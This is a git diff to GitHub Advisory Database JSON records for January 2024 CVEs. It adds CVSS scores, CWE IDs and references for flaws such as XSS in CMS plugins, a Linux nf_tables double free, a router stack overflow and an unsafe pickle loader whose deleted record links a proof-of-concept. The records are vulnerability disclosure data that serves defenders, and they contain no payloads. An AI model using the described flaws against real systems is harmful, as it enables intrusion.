--- a/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json
+++ b/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-120"
 ],
 "severity": "CRITICAL",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json b/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json
index c4f282e5478b4..6d28964ec6467 100644
--- a/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json
+++ b/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3v3p-g3ch-4rcq",
- "modified": "2024-01-26T09:30:23Z",
+ "modified": "2024-01-30T00:30:29Z",
 "published": "2024-01-26T09:30:23Z",
 "aliases": [
 "CVE-2023-48132"
 ],
 "details": "An issue in kosei entertainment esportsstudioLegends mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -27,7 +30,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-26T07:15:58Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json b/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json
index 3f0e1ec337adc..dd5d74f6b55a5 100644
--- a/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json
+++ b/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3w6g-cv32-6cpq",
- "modified": "2024-01-24T21:30:33Z",
+ "modified": "2024-01-31T21:31:03Z",
 "published": "2024-01-24T21:30:33Z",
 "aliases": [
 "CVE-2021-43584"
 ],
 "details": "DOM-based Cross Site Scripting (XSS vulnerability in 'Tail Event Logs' functionality in Nagios Nagios Cross-Platform Agent (NCPA) before 2.4.0 allows attackers to run arbitrary code via the name element when filtering for a log.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T20:15:53Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json b/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json
index 5bac325abf6ec..2eb4ee6acc181 100644
--- a/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json
+++ b/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3w6h-g7wc-c8rx",
- "modified": "2024-01-20T06:30:25Z",
+ "modified": "2024-01-29T15:30:23Z",
 "published": "2024-01-20T06:30:25Z",
 "aliases": [
 "CVE-2023-46447"
 ],
 "details": "The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
 ],
 "affected": [
@@ -33,9 +36,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-319"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-20T05:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-3w6w-r9vq-3r79/GHSA-3w6w-r9vq-3r79.json b/advisories/unreviewed/2024/01/GHSA-3w6w-r9vq-3r79/GHSA-3w6w-r9vq-3r79.json
new file mode 100644
index 0000000000000..9e430ce24983c
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3w6w-r9vq-3r79/GHSA-3w6w-r9vq-3r79.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3w6w-r9vq-3r79",
+ "modified": "2024-02-06T18:30:20Z",
+ "published": "2024-01-31T03:30:30Z",
+ "aliases": [
+ "CVE-2024-22569"
+ ],
+ "details": "Stored Cross-Site Scripting (XSS) vulnerability in POSCMS v4.6.2, allows attackers to execute arbitrary code via a crafted payload to /index.php?c=install&m=index&step=2&is_install_db=0.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22569"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Num-Nine/CVE/issues/12"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T02:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3wf6-8fcq-f34q/GHSA-3wf6-8fcq-f34q.json b/advisories/unreviewed/2024/01/GHSA-3wf6-8fcq-f34q/GHSA-3wf6-8fcq-f34q.json
new file mode 100644
index 0000000000000..67b18afff4d1f
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3wf6-8fcq-f34q/GHSA-3wf6-8fcq-f34q.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3wf6-8fcq-f34q",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2023-6278"
+ ],
+ "details": "The Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo WordPress plugin before 2.2.25 does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6278"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/dfe5001f-31b9-4de2-a240-f7f5a992ac49/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3xpr-x643-29v6/GHSA-3xpr-x643-29v6.json b/advisories/unreviewed/2024/01/GHSA-3xpr-x643-29v6/GHSA-3xpr-x643-29v6.json
new file mode 100644
index 0000000000000..44864083a554a
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3xpr-x643-29v6/GHSA-3xpr-x643-29v6.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3xpr-x643-29v6",
+ "modified": "2024-01-31T15:30:19Z",
+ "published": "2024-01-31T15:30:19Z",
+ "aliases": [
+ "CVE-2024-1085"
+ ],
+ "details": "A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability.\n\nWe recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1085"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
+ },
+ {
+ "type": "WEB",
+ "url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json b/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json
index 90239d2bce32c..fcbfc5601d368 100644
--- a/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json
+++ b/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4287-v2hm-q9f2",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23214"
 ],
 "details": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -45,9 +48,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-43fw-h62p-gjw8/GHSA-43fw-h62p-gjw8.json b/advisories/unreviewed/2024/01/GHSA-43fw-h62p-gjw8/GHSA-43fw-h62p-gjw8.json
new file mode 100644
index 0000000000000..4a79f2a2c3018
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-43fw-h62p-gjw8/GHSA-43fw-h62p-gjw8.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-43fw-h62p-gjw8",
+ "modified": "2024-01-31T18:31:26Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2023-50165"
+ ],
+ "details": "Pega Platform versions 8.2.1 to Infinity 23.1.0 are affected by an Generated PDF issue that could expose file contents.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50165"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.pega.com/support-doc/pega-security-advisory-g23-vulnerability-remediation-note"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json b/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json
index 4709eda093169..e2e6e42eb1891 100644
--- a/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json
+++ b/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-43xx-wfwg-ffh4",
- "modified": "2024-01-28T06:30:28Z",
+ "modified": "2024-02-01T21:30:30Z",
 "published": "2024-01-28T06:30:28Z",
 "aliases": [
 "CVE-2024-23740"
 ],
 "details": "An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -27,7 +30,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-28T04:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json b/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json
index 1d76d8714b28c..13d5c3841df0c 100644
--- a/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json
+++ b/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-20"
+ "CWE-20",
+ "CWE-798"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json b/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json
index 909725e38ee7f..00c9245910104 100644
--- a/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json
+++ b/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-445f-cm55-gq8v",
- "modified": "2024-01-24T21:30:33Z",
+ "modified": "2024-01-30T21:30:29Z",
 "published": "2024-01-24T21:30:33Z",
 "aliases": [
 "CVE-2024-22751"
 ],
 "details": "D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-787"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T21:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json b/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json
index 364465b4cc181..e2773757ce6b3 100644
--- a/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json
+++ b/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-44qm-928x-6p3g",
- "modified": "2024-01-02T06:30:31Z",
+ "modified": "2024-02-08T12:30:48Z",
 "published": "2024-01-02T06:30:31Z",
 "aliases": [
 "CVE-2023-47039"
@@ -32,6 +32,10 @@
 {
 "type": "WEB",
 "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249525"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240208-0005/"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json b/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json
index 0dc2da8df3f62..308cbb7b6ae45 100644
--- a/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json
+++ b/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-44vq-656c-r27f",
- "modified": "2024-01-27T06:30:23Z",
+ "modified": "2024-02-03T00:31:32Z",
 "published": "2024-01-27T06:30:23Z",
 "aliases": [
 "CVE-2024-22862"
 ],
 "details": "Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-190"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-27T06:15:48Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json b/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json
index 6e8b4dc3779a8..ed61e4ef5ab1a 100644
--- a/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json
+++ b/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json
@@ -21,6 +21,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20918"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0002/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json b/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json
index ac5b0f402a4ea..edb8ca1d44d55 100644
--- a/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json
+++ b/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-131"
+ "CWE-131",
+ "CWE-787"
 ],
 "severity": "CRITICAL",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json b/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json
index 5654b28cf5698..55396aaef9fcc 100644
--- a/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json
+++ b/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-46g9-6366-qgqc",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23211"
 ],
 "details": "A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user's private browsing activity may be visible in Settings.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
+ }
 ],
 "affected": [
@@ -63,7 +66,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "LOW",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json b/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json
index 1635fc9843793..bb97d7e92560d 100644
--- a/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json
+++ b/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json
@@ -28,6 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-120",
 "CWE-131"
 ],
 "severity": "CRITICAL",
diff --git a/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json b/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json
index 5f8df2b5c91da..1757d7d138aa2 100644
--- a/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json
+++ b/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-47g8-q2w5-x9jm",
- "modified": "2024-01-25T03:30:59Z",
+ "modified": "2024-01-31T21:31:03Z",
 "published": "2024-01-25T03:30:59Z",
 "aliases": [
 "CVE-2024-0624"
@@ -36,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-352"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json b/advisories/unreviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json
deleted file mode 100644
index 7dc5362e0108c..0000000000000
--- a/advisories/unreviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json
+++ /dev/null
@@ -1,50 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4957-7vhp-7v59", - "modified": "2024-01-26T18:30:34Z", - "published": "2024-01-26T18:30:34Z", - "aliases": [ - "CVE-2024-0937" - ], - "details": "A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0937" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-6" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-6/blob/main/poc.py" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?ctiid.252182" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?id.252182" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-26T18:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4c27-r897-v3m2/GHSA-4c27-r897-v3m2.json b/advisories/unreviewed/2024/01/GHSA-4c27-r897-v3m2/GHSA-4c27-r897-v3m2.json new file mode 100644 index 0000000000000..89c02cc94f0e5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4c27-r897-v3m2/GHSA-4c27-r897-v3m2.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4c27-r897-v3m2", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22282" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Torbert SimpleMap Store Locator allows Reflected XSS.This issue affects SimpleMap Store Locator: from n/a through 2.6.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22282" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/simplemap/wordpress-simplemap-store-locator-plugin-2-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4c3x-wrfg-6pjr/GHSA-4c3x-wrfg-6pjr.json b/advisories/unreviewed/2024/01/GHSA-4c3x-wrfg-6pjr/GHSA-4c3x-wrfg-6pjr.json new file mode 100644 index 0000000000000..3962af7e6304a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4c3x-wrfg-6pjr/GHSA-4c3x-wrfg-6pjr.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4c3x-wrfg-6pjr", + "modified": "2024-02-06T21:30:25Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2023-31505" + ], + "details": "An arbitrary file upload vulnerability in Schlix CMS v2.2.8-1, allows remote authenticated attackers to execute arbitrary code and obtain sensitive information via a crafted .phtml file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31505" + }, + { + "type": "WEB", + "url": "https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31505" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4gfv-m8hr-53f2/GHSA-4gfv-m8hr-53f2.json b/advisories/unreviewed/2024/01/GHSA-4gfv-m8hr-53f2/GHSA-4gfv-m8hr-53f2.json new file mode 100644 index 0000000000000..f147694583d51 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4gfv-m8hr-53f2/GHSA-4gfv-m8hr-53f2.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gfv-m8hr-53f2", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2023-45926" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45926" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json b/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json index 3ba7aec067f83..16cbe62074c86 100644 --- a/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json +++ b/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4gqf-q3p9-g947", - 